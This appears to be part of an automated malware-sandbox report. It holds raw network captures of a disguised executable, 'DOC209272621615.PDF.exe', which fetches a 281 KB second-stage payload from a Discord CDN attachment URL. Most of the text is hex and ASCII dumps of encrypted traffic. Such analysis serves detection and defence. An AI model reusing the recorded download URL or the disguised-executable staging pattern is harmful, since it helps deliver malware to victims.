51 97 e2 a8 b7 90 73 eb 9d 51 1c b7 13 df b8 09 47 7b a3 1c 11 f8 78 60 fc f9 fd 4a a7 82 13 f5 f3 8e 70 d1 59 20 1d 53 1d
                                                                            Data Ascii: M/ujK)lqH8Ygo<C"2Z1C:k^,Qt5 YUakS/zF(zp}r$~Hbdy;>"HJ'3?{^~">geI-;1NrF!N6x1+=;@K<tW6QJ+"C09<[t4j!iQsQG{x`JpY S
                                                                            2021-12-01 15:22:56 UTC 234 IN Data Raw: 7d a0 5a 88 1d 90 62 e4 04 d1 7c 25 b6 93 c9 61 ac b9 d8 cf 8f f6 a1 c5 96 60 19 a9 c8 e7 5b 74 43 30 e1 a5 56 81 04 d2 77 b2 0f b6 29 f1 3c 46 f0 03 10 30 39 d9 18 2c 17 a2 27 8a 7b a4 3c 46 b0 a3 c1 75 ae a4 5c f6 59 09 60 f8 46 b9 28 75 7e 2c a5 ce 3a 5a 6d 5a 75 b6 1a 2a ec 18 bb 05 f3 89 26 08 7b a5 78 3d 8c 08 83 91 a2 47 6d 5a e4 2c 19 a8 c8 e6 5f 7f a1 c4 fa 7b bb 05 4b 2d d4 c4 da cb 53 19 9e 5a 44 b4 52 99 36 57 d5 41 da cc 0e 33 17 a4 ba 9c de 3a dc 37 4d 2d 6c d8 60 fe cb 6a 6c d8 78 3a 14 3c 01 6c 81 93 af 20 77 b4 f2 08 bb 02 a0 5d 7c 20 1f 98 70 c6 ef 80 07 5d 54 9c 6e c3 47 3d 0c c9 a6 4f c9 66 3e 4a 4c a9 d6 c7 85 98 98 68 5b 73 cf 51 82 10 a7 cd c4 fa dd b4 2a 74 7d a4 02 d0 8a 05 0e 32 13 bf 04 d5 43 37 c2 f1 ac be bd 07 85 9b 07 5f 93
                                                                            Data Ascii: }Zb|%a`[tC0Vw)<F09,'{<Fu\Y`F(u~,:ZmZu*&{x=GmZ,_{K-SZDR6WA3:7M-l`jlx:<l w]| p]TnG=Of>JLh[sQ*t}2C7_
                                                                            2021-12-01 15:22:56 UTC 238 IN Data Raw: dc 05 8e bb 31 d9 9b 09 74 fe be 63 55 33 3a a6 7d 97 30 e3 95 d3 8a 97 d7 76 e3 19 9c 65 bd 4c 9b e0 e9 cc dc 05 8e 17 97 d6 12 4e a0 6f 94 68 e1 91 2f ff db 80 fa 59 3c 72 1d a6 7d 97 31 28 41 01 b9 f4 40 7c f5 02 e2 12 ec 86 2c 4a 70 65 5a bf dd 06 ec 2d 28 31 d8 fb 37 85 aa 86 ca 8d be b8 4c cb 59 3c 73 7d 96 54 49 22 32 5b a7 d7 77 86 ca cd 5e c9 b2 91 c8 d3 88 c9 54 af 13 8d be b8 4f fd d6 f4 a5 34 5f 4a 73 c7 4f 23 b5 22 32 5b a4 e0 0e 01 ba 2d ce e0 eb db 81 a0 6e f0 36 65 b4 26 3c 73 7d 96 55 33 33 b3 1d a7 11 d6 f5 c3 ab 59 3c 72 14 33 dd 87 41 2a 46 8d 50 b1 18 18 f4 be b9 2d 23 5d 46 8c 3c 73 7d 97 3a ac 8c 3c 73 7d 96 54 42 36 64 d7 77 87 af 12 e7 07 6e f1 55 b4 a0 6f 9e 11 88 30 b8 c2 c3 44 6a b0 96 55 32 5a be b8 47 35 e2 12 e7 b7 27 be 54
                                                                            Data Ascii: 1tcU3:}0veLNoh/Y<r}1(A@|,JpeZ-(17LY<s}TI"2[w^TO4_JsO#"2[-n6e&<s}U33Y<r3A*FP-#]F<s}:<s}TB6dwnUo0DjU2ZG5'T
                                                                            2021-12-01 15:22:56 UTC 242 IN Data Raw: 87 af 13 8d be b9 2c 48 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d4 d0 e6 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 85 4a 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bc 14 0f 83 a5 fa 4f 23 b5 22 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d5 02 e2 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be bb 71 78 09 74 ff db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bc a4 78 09 74 ff db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d bf db 81 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87
                                                                            Data Ascii: ,HF<s}U2Z,Kdw,Kd}U2Z,Kdw,KdwJU2Z,Kdw,KdwO#"2Z,Kdw,Kd,Kdw,Kdwqxtn6dw,Kdwxtn6dw,Kdwn6dw,Kdw
                                                                            2021-12-01 15:22:56 UTC 246 IN Data Raw: cd 1f d3 55 88 31 99 0f f7 7e e7 60 13 55 da ff 9a 8c bc 15 92 0a b8 fe e3 6a 19 78 76 ec 2c 0a 81 7c ab 09 35 9a 43 bf 3b b0 45 8a 8e be 46 52 51 c0 be f8 99 a0 cf 63 14 41 54 15 6d 91 2c e9 4c 9b a0 19 40 c5 4a d7 0f 87 15 92 0a 25 c6 74 00 22 ed b0 7e 18 58 6a 9e c8 d2 aa c9 00 67 a0 91 2c 8e a9 04 a6 0a 2a fe 59 7d e1 7c a9 04 a6 ae e9 1d 59 c3 9a 1e c0 be f8 99 a8 23 b5 63 1b f5 78 f6 ba 4b f1 50 a5 bb 46 50 1d a6 3c 04 23 0f 83 e4 cb 2d 77 78 f6 9a 3b 19 9c 25 69 e0 af 13 cc 92 1f 11 77 78 ec 27 57 37 a6 0a 42 3a 6e b1 6f ef 09 74 be 6a 62 6b 96 ab cf 8c d4 f0 77 54 43 a4 87 50 69 f1 50 a5 bb e2 ff 7a f1 47 c1 17 7f 9b a0 bd da 5e c8 93 1e fc 41 8b 46 73 82 4a 1b 2a b9 d2 3e 29 2c b4 5f b4 c8 57 ba 7f 10 fa b1 c0 b8 42 7d 69 9b 85 2f 58 46 72 2c 9a
                                                                            Data Ascii: U1~`Ujxv,|5C;EFRQcATm,L@J%t"~Xjg,*Y}|Y#cxKPFP<#-wx;%iwx'W7B:notjbkwTCPiPzG^AFsJ*>),_WB}i/XFr,
                                                                            2021-12-01 15:22:56 UTC 249 IN Data Raw: ff 33 8e 11 77 79 6f 04 0f 4f 66 57 c8 2d 15 e1 78 09 35 8a 2b 71 b4 f5 4f 23 f4 93 dd 25 45 f4 bf 7e f0 65 0a 09 8a d4 68 09 a4 3d 7d 69 9b 3a fa a7 ff 9a 37 e3 2d 1e 7d 1b a1 b1 cb 55 91 37 19 63 33 35 b1 48 6e 0e e3 2c a3 21 f5 49 eb 56 6f c6 25 ba ee 56 58 01 8b ec a1 f0 77 54 a7 5c 3c 8d 41 87 47 5c 93 32 a4 9b 3b 19 44 c2 48 6e 0f 58 6f 9b e1 d1 0f 57 8f 1b f4 cd 5e 89 67 5b e2 ec d2 14 a7 17 c4 98 a5 04 04 1c cb 85 ef 38 96 aa 5c 34 b7 27 fe 3e c4 70 29 91 45 0a b7 f4 6c 48 6e 0e ff 12 e2 40 2d 31 26 d8 e6 f5 22 77 0c 04 18 c5 52 42 82 63 32 fe e1 70 a0 e3 95 93 1e 00 7e e7 61 af f9 24 64 87 50 5b a5 c7 a7 1b e4 93 32 a5 26 05 81 a0 2f b4 2c f3 59 69 e9 a4 39 3f e3 36 9b 1e 28 4a 7e 4b 49 eb 57 d3 33 35 0a b3 96 aa 78 d5 28 a9 04 a6 1a 6e 48 79 d9
                                                                            Data Ascii: 3wyoOfW-x5+qO#%E~eh=}i:7-}U7c35Hn,!IVo%VXwT\<AG\2;DHnXoW^g[8\4'>p)ElHn@-1&"wRBc2p~a$dP[2&/,Yi9?6(J~KIW35x(nHy
                                                                            2021-12-01 15:22:56 UTC 253 IN Data Raw: d4 0f 7c ee 5c 2b 3d a3 7e e0 43 8e 9d a6 f6 4d 5b ca 81 96 de 0d 90 c5 4f 57 c1 c5 aa f2 b0 69 9a a6 12 e2 eb fc df 6b 2c c6 35 a7 76 06 2c c8 d1 6b 9d a6 f6 4d 5b ca ee da 07 e5 65 a5 07 c6 25 4e f5 49 c8 92 c0 b6 e0 85 aa 87 50 5a 5f ca dc 8f c7 25 a6 09 b4 24 c8 2d 31 e0 e6 1e a3 90 ad fa 17 94 58 fc df 93 46 70 b0 1d d4 1b 55 6a e5 92 0e 8b a9 5c 48 6d 2b 42 8c 49 14 0b 01 dc f8 0f 08 0e ff 2e 37 0f 73 3d 7d 9e 2c c0 5a eb 22 cd a0 97 36 8c c8 87 24 d3 28 cc 23 4a 6d 76 ec d8 af 98 86 6c 60 c5 0f 08 d6 80 dd 02 1d 59 ca f5 2a 1c cf 26 b7 2f 96 de e1 dd 0d 81 5e 32 57 df 7f ce 6a 0e 45 87 ff 24 c8 d5 df 63 b9 69 ed 5e 88 ba a7 ba 24 67 af 56 39 18 5c 4a 62 90 45 02 b7 ac 80 5d cd a2 36 ef b3 1d a6 84 ce 1d e3 1c 01 d6 91 fa b0 f2 3b b0 da e4 70 a0 bc
                                                                            Data Ascii: |\+=~CM[OWik,5v,kM[e%NIPZ_%$-1XFpUj\Hm+BI.7s=},Z"6$(#Jmvl`Y*&/^2WjE$ci^$gV9\JbE]6;p
                                                                            2021-12-01 15:22:56 UTC 258 IN Data Raw: 53 1b 35 e2 53 14 1f ab 49 2d d2 eb e9 9d fe 59 7c 2a 52 aa c7 76 0c fb 91 af c7 4f 23 b5 2e 50 e4 23 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 58 82 4a 96 15 1f 68 bc 4c 70 0a 09 75 81 49 d7 77 c6 f6 52 c2 d3 e4 7c 4a cf 39 2c 78 f6 ba bc ee d9 7c 53 3d f6 50 2e 50 a5 fa 4d a7 ff 9a d5 e6 a5 ef c6 cd 1f 79 74 fa b0 b6 2c 2f e3 6a 82 22 73 46 9c 0c ae 51 1b 4d 95 87 af 13 8d 8f c3 45 0a f7 38 96 aa 78 09 74 ff eb a9 04 e7 9e 96 aa 78 f6 45 4a 1b 62 8f 3b 1a e1 6f 72 99 35 21 b0 d7 4d a9 6c fb 58 dd df d2 b1 d8 c9 ab f6 65 98 b2 9b a0 bc 70 4d e1 6f f9 e0 e6 1d e7 4d c6 75 7d 69 9a ad e6 e2 ec a6 46 64 d7 36 ee a1 48 6e 0f 9c 19 74 ff 9a 65 5e 70 0a 09 54 40 95 d2 aa 55 f6 fd 29 3b 7b c8 3a 6e b1 ca 03 dc fb
                                                                            Data Ascii: S5SI-Y|*RvO#.P#,Kdw,Kdw,KXJhLpuIwR|J9,x|S=P.PMyt,/j"sFQME8xtxEJb;or5!MlXepMoMu}iFd6Hnte^pT@U);{:n
                                                                            2021-12-01 15:22:56 UTC 262 IN Data Raw: 5c 95 d2 eb a9 80 8f 3c 63 de ca 5c e1 ee 30 49 6f f0 1e 5d 46 a8 f9 4c 43 8e b3 96 03 37 27 34 9c 64 d7 77 13 1c dc 0c 70 f5 83 8f 4f 99 1c a8 41 5b 1f f4 74 ac 73 65 d1 ae 1a e6 09 ff c3 03 ef 7b 9d 6d 76 42 09 84 ac 76 8f 94 06 bf fb 5a 7d 96 55 32 da 6d 91 d8 71 bb 31 d8 fa cb cb a6 6d e5 93 b9 fe dd 45 51 76 24 44 0e ff 24 36 a2 9b f9 8f 4e 72 f9 1e 2b 1b a2 a5 71 a0 e5 68 6a b0 c5 4a 92 89 e9 41 8b e2 4d 9b 9d 12 57 0c 03 39 65 a5 05 96 29 2c b7 62 59 c4 9d 6d a0 e5 ca df ce 6a f7 b9 d4 85 91 7f e6 ee 0a b8 e9 54 f2 b2 98 2f 23 c0 85 a2 98 aa f2 b2 9e 1c d3 30 6e 0f 7c ef 01 b7 db c4 43 d6 7e d6 7e 38 15 61 6b 99 a3 35 67 57 62 2d 32 1f 20 fb 5a 4e ed 25 f4 41 eb 59 40 bd b3 15 c7 b0 6a a3 7e cb d2 1b ec a7 bc b5 c9 a4 3d 7f 73 ac 78 4c 98 a2 36 ef
                                                                            Data Ascii: \<c\0Io]FLC7'4dwpOA[tse{mvBvZ}U2mq1mEQv$D$6Nr+qhjJAMW9e),bYmjT/#0n|C~~8ak5gWb-2 ZN%AY@j~=sxL6
                                                                            2021-12-01 15:22:56 UTC 266 IN Data Raw: a7 3e 91 0b 86 d3 90 bd de f1 fd 5d 46 cd 44 de 61 40 f4 24 6e a9 5e 08 c2 e7 cc 23 ad 85 52 ef 38 bf b0 62 9f 60 ed fd 29 dc 8f 3b b4 2b 1f 20 d1 25 31 fc 07 91 d0 6d 96 10 8e 92 c0 76 8f db d0 19 94 db 79 c9 df 5d cd 7e 4f dc 3c f8 b2 de 82 f1 33 2d 83 2e 5c 94 af 2b 42 7a 4b 92 9d 6d 9e 24 ba 5b 04 6e e8 73 82 2a cd a6 38 e2 c0 35 ee 66 23 8d 35 1a 5b ca 04 6c 17 da 72 da 76 60 fd 29 a0 6e b1 02 b0 fe 0c 3b c2 3c 8c c1 86 c4 30 10 8e 61 d9 18 29 3b 95 d2 aa 9d 91 a0 3b 31 eb 51 6d e7 45 81 51 a3 09 29 4d ee 6c 62 09 47 58 ef e0 fe 9d 65 b6 2e 05 69 24 ba 6c b6 fc 0f dd d9 8c d7 88 ce c3 c2 2a 85 55 cd 77 36 8c c0 fb 5c c3 04 fe ca bf 2b 40 19 c5 13 d7 b7 14 f0 c9 ab 9f 03 a7 74 30 de f5 97 5c 3c 8c 7a a4 90 80 96 a9 51 a5 da 76 60 fd 29 a0 6e b1 01 d3
                                                                            Data Ascii: >]FDa@$n^#R8b`);+ %1mvy]~O<3-.\+BzKm$[ns*85f#5[lrv`)n;<0a);;1QmEQ)MlbGXe.i$l*Uw6\+@t0\<zQv`)n
                                                                            2021-12-01 15:22:56 UTC 270 IN Data Raw: 4f 62 cf 87 af 52 b7 93 cd 1e 18 59 3c 32 47 8f c3 04 fb 7d 96 14 13 ad 0e 41 1a 8a 37 a6 64 4b 19 dc 34 1f ab 49 24 77 87 ee 27 9f eb e8 37 1b a1 b1 0d a6 7d d7 53 69 64 96 76 58 b9 6d 4f 9b e1 d1 49 24 37 a6 62 16 14 4e bf af 13 cc c6 25 ba ee 2b 59 3c 33 ed ee 31 99 c6 45 0a b6 95 92 4b 58 af cb 59 7d 8e 41 00 9c 70 1d a6 3c 66 74 ff 9b d7 c7 4f 63 63 c1 40 3d cf 73 7d d6 cc c0 be f9 f5 da ff 9b d8 ee 31 98 63 5d 46 cd 56 f0 36 64 d7 6f 73 3c 7a f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 dd 8c 30 55 73 74 1b a1 f0 36 64 d7 77 87 af 13 cc d5 16 d4 7b 6e 0f 83 a7 8c 59 4f 50 c4 a4 3b f6 9f 69 59 93 ed ae 37 79 9d 36 36 88 42 1e 07 5a bf 3b b1 08 71 0a 93 b9 5c a2 17 d6 86 4b 77 ee 43 71 2b 80 12 05 69 25 b2 7f 9b a1 7d 96 55 41 65 29 b7 46 e0 4d 19 9c 64
                                                                            Data Ascii: ObRY<2G}A7dK4I$w'7}SidvXmOI$7bN%+Y<31EKXY}Ap<ftOcc@=s}1c]FV6dos<z6dw,K0Ust6dw{nYOP;iY7y66BZ;q\KwCq+i%}UAe)FMd
                                                                            2021-12-01 15:22:56 UTC 281 IN Data Raw: 4e 60 46 8c 3c 73 7d 96 55 32 52 aa c7 93 f7 81 a0 6e f0 36 64 d7 b7 27 bf 3b f1 b8 aa 87 af 13 8d be b8 aa c7 93 fd d6 b5 fe 7f 9b a1 2c 52 aa 87 8a e5 73 85 ae b5 66 5f 4b 19 b9 fc bd ce e5 be fd 55 12 f5 c2 48 95 f6 01 d4 08 f5 e6 59 bf f7 07 e5 59 61 a8 69 9b 1e 48 97 3e bb 31 98 86 38 01 4f aa e3 cc 85 f0 f6 76 04 a6 af 6f 76 fb f1 31 bc 84 d8 9e 69 24 eb a4 10 50 65 69 88 ba fa 4f 4f 4c f4 02 8f ac fe 1f d9 08 82 60 bf 5a e8 22 57 43 64 93 a0 01 2d 88 43 71 0b 3b 83 c4 9e 69 64 d7 0e 43 68 8e 33 9b 93 b9 5f 09 06 8d e8 22 32 28 35 b1 75 ed dc 42 ee 5e a7 bd 44 e6 4b 19 9c 64 d7 05 1d f5 af 7c 61 16 6d 2d bc d5 24 37 e7 ed da ac e1 ff a9 42 e7 eb c8 96 27 de 5f 4b 19 9c 64 a5 8e 12 67 30 27 f9 f4 12 78 68 b7 27 bf 3b f1 ca a3 a6 10 6a 94 16 20 7f e9
                                                                            Data Ascii: N`F<s}U2Rn6d';,Rsf_KUHYYaiH>18Ovov1i$PeiOOL`Z"WCd-Cq;idCh3_"2(5uB^DKd|am-$7B'_Kdg0'xh';j
                                                                            2021-12-01 15:22:56 UTC 286 IN Data Raw: 9b b2 7b 55 b1 f4 cb 0c 3b 7a 0e 41 e5 aa a2 8c fc df 48 ca 89 77 84 d8 05 0f c4 20 ee 1a d8 71 bb 6a b8 6c e8 dd 79 ea 72 12 cc f7 04 6c e5 e7 6c d0 3e f3 4f a8 d4 a3 36 39 14 e4 e7 60 bf bf d2 28 41 40 b4 36 0c eb 20 49 4d 47 55 f2 08 0e ff 5f 90 ae 91 88 9c b0 83 2e 50 a5 fa 59 85 aa c6 44 d7 cf 9c 9b 65 aa 6f 73 3d 5b 15 87 24 37 e7 9f ec 95 d2 aa 0e 18 a1 0f 7c 96 50 4d 1e 68 f1 b8 bf b0 96 55 32 58 00 dd c7 c7 7f 23 4a 69 1d 5c 2b c9 15 1a 36 dc fb 2e db d1 80 1d e6 6c 1b b4 2b c9 15 5b 51 90 b9 d3 e6 7d 7e 18 59 4d d2 fe d2 eb e8 eb a5 42 7d 69 e1 d4 18 19 dc 14 0f 96 de 09 74 ff dc bd 36 25 72 2e e8 dd 79 09 2d 26 3c 33 cd 5e dd 0d 7e 18 19 9b 58 b9 6d a6 d5 ca 28 be 3c 1d 4e a0 2e 40 7d 83 2e 50 a5 fa 48 28 41 41 c8 5e 70 0a 09 f1 3b 19 9c 24 27
                                                                            Data Ascii: {U;zAHw qjlyrll>O69`(A@6 IMGU_.PYDeos=[$7|PMhU2X#Ji\+6.l+[Q}~YMB}it6%r.y-&<3^~Xm(<N.@}.PH(AA^p;$'
                                                                            2021-12-01 15:22:56 UTC 302 IN Data Raw: 4b ee 33 a8 af ea a7 15 e0 0e 00 dc f0 cc 5d 84 26 36 b6 ce a7 f1 cb 53 29 fe 75 84 ad 48 90 33 f0 cf e3 90 32 71 81 20 23 3f 29 f5 02 d3 ae df 61 bb 73 89 f1 62 26 79 05 69 25 32 36 69 be b6 d6 ff df b1 34 f3 6f 42 42 b3 de 47 f8 3e 58 85 ae e5 5a b6 09 22 d9 e7 67 32 83 47 d4 6b a9 35 3a b3 19 77 86 9c 62 a7 ff d2 42 e4 f8 95 49 2b 12 08 1a 21 6f 77 f3 bd cd de e9 7d 94 25 97 28 c1 1b 5e 37 4e 8a df 77 da 74 ac 88 f1 3b f2 4e a1 0b f9 1c aa b4 d5 72 c4 48 91 c8 d2 ae 79 4e a1 a8 82 22 32 2e b8 f8 0c f1 cd 1b 9d 39 c8 d4 7a 41 74 0e 39 36 93 cd 5e c8 bf d3 2b c1 35 19 d9 46 8a bd e4 29 c4 c8 d2 97 3f 0a 7f dd 87 da d2 14 8f c6 b9 07 91 48 af 99 dc 04 e7 1a f6 ab d0 e6 5c 4b 69 49 cd bc 6f e8 da 82 fb 4a 5d cf 98 1f 23 b5 63 9d ed 0e 00 dd 86 2c b7 62 15
                                                                            Data Ascii: K3]&6S)uH32q #?)asb&yi%26i4oBBG>XZ"g2Gk5:wbBI+!ow}%(^7Nwt;NrHyN"2.9zAt96^+5F)?H\KiIoJ]#c,b
                                                                            2021-12-01 15:22:56 UTC 313 IN Data Raw: f1 b8 2d 4a 99 1c a6 b4 93 3b c2 c3 45 0a 4e 24 38 69 9c 19 1f 79 bf c7 1a 97 2f 9e e0 58 ea df 4f a0 82 a9 51 28 45 c8 8f 98 04 21 3b 0d 2f 2c 43 8e 82 a9 05 db 88 44 71 fd 26 b7 d8 05 df b8 42 d2 ef f0 bb 39 b1 93 9b b2 77 0c ae 01 5f 4f e1 cd a1 0f 35 a3 1d f6 41 c0 3d fe 1c a8 6e 7b c4 08 7a 0e 0c 39 b1 43 85 aa c7 4d a6 78 e2 d3 5e cc a8 42 06 13 72 21 0c 13 4e 2b c5 1f 20 3d bb ba a7 a2 f8 19 70 7e 4d 1e 68 6c 28 41 00 dd 87 ab 49 d3 92 b4 7a b1 f0 f6 ce 22 cd a1 21 bf d3 6f c3 42 f6 45 0e 78 8a f7 4c 58 46 73 cb fa a7 af 17 57 b4 30 96 51 78 f6 45 81 f0 30 21 70 70 36 6c bb ce b0 97 5c c5 3e 68 68 28 c4 c0 35 21 b8 fa b0 c7 4e 2b 0a f7 b2 52 2f d3 e2 1b 2a 1e 2c 1b 5e 9a 5d cd 0e 52 b3 69 b6 20 2d 8e cc 1f f3 b5 72 05 6b e2 41 50 a5 fa 4f 23 b5 e5
                                                                            Data Ascii: -J;EN$8iy/XOQ(E!;/,CDq&B9w_O5A=n{z9CMx^Br!N+ =p~Mhl(AIz"!oBExLXFsW0QxE0!pp6l\>hh(5!N+R/*,^]Ri -rkAPO#
                                                                            2021-12-01 15:22:56 UTC 329 IN Data Raw: 2d 4b 16 d2 62 84 74 f8 8b 4f df c3 ce 22 cd a1 0f 7c ab f6 ba 55 b0 12 05 6a 24 c1 1b 31 48 52 f1 e6 dd b7 27 bf 7a a9 14 0a 30 55 73 da eb b4 29 c4 db 7e e8 22 73 da e7 9a 98 5a be b9 2e ac cf a4 87 50 5c ea cf 63 46 73 8d 20 a0 fe c9 c4 0b 22 6c 2b d0 e7 67 dc fb 2e a6 e6 f5 94 50 cf 63 55 b2 9b 89 b4 a0 2f 74 ef b6 63 57 be bd 66 55 36 32 d1 6e 7b 81 4e 23 99 a9 04 f4 bf cb 59 7d 31 c0 83 24 9f 00 22 cd a6 b3 f5 32 d3 dc 76 04 e7 94 60 34 de c2 c2 0d 57 cf 2d 45 9a e4 f3 42 7d 6e 17 7f 59 4e a0 6e fb e1 69 e5 51 29 34 be 3a 5d 42 0f 13 4e fb 8f 03 55 32 5a ff 7c 03 61 96 aa 78 f0 7f 73 a7 76 f4 c9 ac bf 67 d6 09 32 d3 6e b3 90 16 60 cd 4d e1 60 36 e5 da 8a 3f 07 28 b7 db b2 d7 fe 51 e1 13 b8 df 77 b4 ec a7 ff db 81 a1 0c c8 96 a2 c8 a7 39 65 0c 28 c8
                                                                            Data Ascii: -KbtO"|Uj$1HR'z0Us)~"sZ.P\cFs "l+g.PcU/tcWfU62n{N#Y}1$"2v`4W-EB}nYNniQ)4:]BNU2Z|axsvg2n`M`6?(Qw9e(
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            2 192.168.2.3 49754 162.159.129.233 443 C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            2021-12-01 15:23:14 UTC 333 OUT GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1
                                                                            User-Agent: aswe
                                                                            Host: cdn.discordapp.com
                                                                            Cache-Control: no-cache
                                                                            2021-12-01 15:23:14 UTC 334 IN HTTP/1.1 200 OK
                                                                            Date: Wed, 01 Dec 2021 15:23:14 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 281088
                                                                            Connection: close
                                                                            CF-Ray: 6b6d50c8d96b4eaa-FRA
                                                                            Accept-Ranges: bytes
                                                                            Age: 36027
                                                                            Cache-Control: public, max-age=31536000
                                                                            Content-Disposition: attachment;%20filename=Wkklnmczcyrsyafzucgflytssyuynbb
                                                                            ETag: "95c7205834a4a92a4f9bfc212c2326dc"
                                                                            Expires: Thu, 01 Dec 2022 15:23:14 GMT
                                                                            Last-Modified: Wed, 01 Dec 2021 04:37:50 GMT
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: HIT
                                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                            x-goog-generation: 1638333470898312
                                                                            x-goog-hash: crc32c=meGuLw==
                                                                            x-goog-hash: md5=lccgWDSkqSpPm/whLCMm3A==
                                                                            x-goog-metageneration: 1
                                                                            x-goog-storage-class: STANDARD
                                                                            x-goog-stored-content-encoding: identity
                                                                            x-goog-stored-content-length: 281088
                                                                            X-GUploader-UploadID: ADPycduUlNf2PA7zKpv-QoNOOzrwHgbFRX6mQZp4zDQlyL3kPqYyPZgI-KJkcPR2dvSRCq08DP8GeNCAFObtI59ESkwHkFkhMQ
                                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                            2021-12-01 15:23:14 UTC 335 IN Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=stUHoTV0ZCS%2Ba%2FXYvzfkLef%2Fh103BA32SIuGqwHNWzO7ofOXfHOLoS9i0sJAztHcM9YxAwilPGFB5gKAfayu7OiHbPoEqG%2BIYuuTYMnjGZvC2OqUGpcGlImSG%2Bii2NS9e5B4bA%3D%3D"}],"group":"cf-nel","max_a
                                                                            Data Ascii: Pk+l'>~^Q1;|Q-%*DFi3ovR/^I`vxUi'&Qrtc[CIO+GdAh_S4DH(DRRKo{/@fE1hgHsN:8uY1\w"?iOQ(S# Tg^,T5W%t%61T
                                                                            2021-12-01 15:23:14 UTC 348 IN Data Raw: 31 55 d4 ef 2c aa da 75 40 62 fb cf 95 42 e0 11 90 57 34 f2 eb 20 20 bf 5d e8 fb c3 69 7a 09 f3 e5 83 b8 b2 80 93 08 ce ec 57 2d ce 71 14 1f ae 88 20 bf de 89 a7 89 cf 6f 54 8a 3c d7 11 07 7e 80 4c 86 3d fb cd d1 a4 3c 7c 60 bf 32 e1 f1 3f 2e 35 ce fa 48 e7 8e b3 81 f6 5d 5f 53 33 5b b9 69 60 5d 2e 40 78 10 14 b4 45 3b e2 82 33 7f 72 ec 0f 9b e4 81 f0 2c 53 33 cc 46 4d 27 b2 ea 57 22 1b d4 ed 08 ee a9 f0 6f ee 66 d9 6f 69 79 03 8a 75 86 1c 5e dd 24 20 ab f8 5d 35 fc ad 8a 61 43 0a f0 2c e9 6e cf 6c 66 33 8a 92 8c c8 55 f1 bd 18 02 e3 17 c0 b8 b3 0c fe d6 30 23 af 3f e0 01 29 ab 0b e5 cc c4 d1 70 eb 2f 2b 8c 38 48 b4 a3 4e be 3f 0c e7 0e 5f 4e ba b3 0a 67 b9 6f 72 d0 95 d3 cb 40 fb 2e 07 44 91 23 27 d6 ef a2 76 1c 8d 64 e8 24 95 13 63 df 43 14 80 d4 ed 84
                                                                            Data Ascii: 1U,u@bBW4 ]izW-q oT<~L=<|`2?.5H]_S3[i`].@xE;3r,S3FM'W"ofoiyu^$ ]5aC,nlf3U0#?)p/+8HN?_Ngor@.D#'vd$cC
                                                                            2021-12-01 15:23:14 UTC 350 IN Data Raw: 99 40 e0 13 a2 e7 1b 0f 26 85 56 cf e9 27 27 24 3a 75 d2 18 c1 50 a8 59 38 f9 e6 cb 60 d4 e1 00 49 34 ab ee 60 8f 10 02 f1 35 7b 9d f6 25 45 17 41 17 0a dc cf 5c d0 e3 72 7e e7 13 62 57 5a 70 2d d8 fc d8 8f 71 fd fa 8c 38 ea 35 32 97 a5 67 58 aa 82 3b e0 96 4e 6a 46 1f 37 ff 72 8f 4d 6c 2b c3 df 25 01 54 a8 9a 55 f7 c4 78 ac ff 1d b9 d9 97 79 f2 c9 d9 2c ae bb b7 e0 b0 92 cd 4d db dd 00 5c cb e7 e5 0c b3 f0 ea 6a e3 8d 37 1a 10 82 48 5b 10 89 a9 0d ba a8 06 f7 04 8a ad c0 be 3f 6b cd 4c 82 33 24 d1 3f 54 60 d6 e9 24 09 d4 fd cb 41 e7 79 ac 3d 2e 5c df 04 c4 78 0d 7b 88 bf 11 80 b3 63 c6 2e 5a 3c 41 13 97 ca cf f8 e4 a3 fe 92 50 02 0f 31 da 36 7d 1a d2 4d 18 89 6e 55 29 cd 93 dd 2e bf 85 ac 4d 1b 2c 88 83 b7 bb fc e6 00 db 5e c7 e5 6a 5d 49 c1 5a 31 19 28
                                                                            Data Ascii: @&V''$:uPY8`I4`5{%EA\r~bWZp-q852gX;NjF7rMl+%TUxy,M\j7H[?kL3$?T`$Ay=.\x{c.Z<AP16}MnU).M,^j]IZ1(
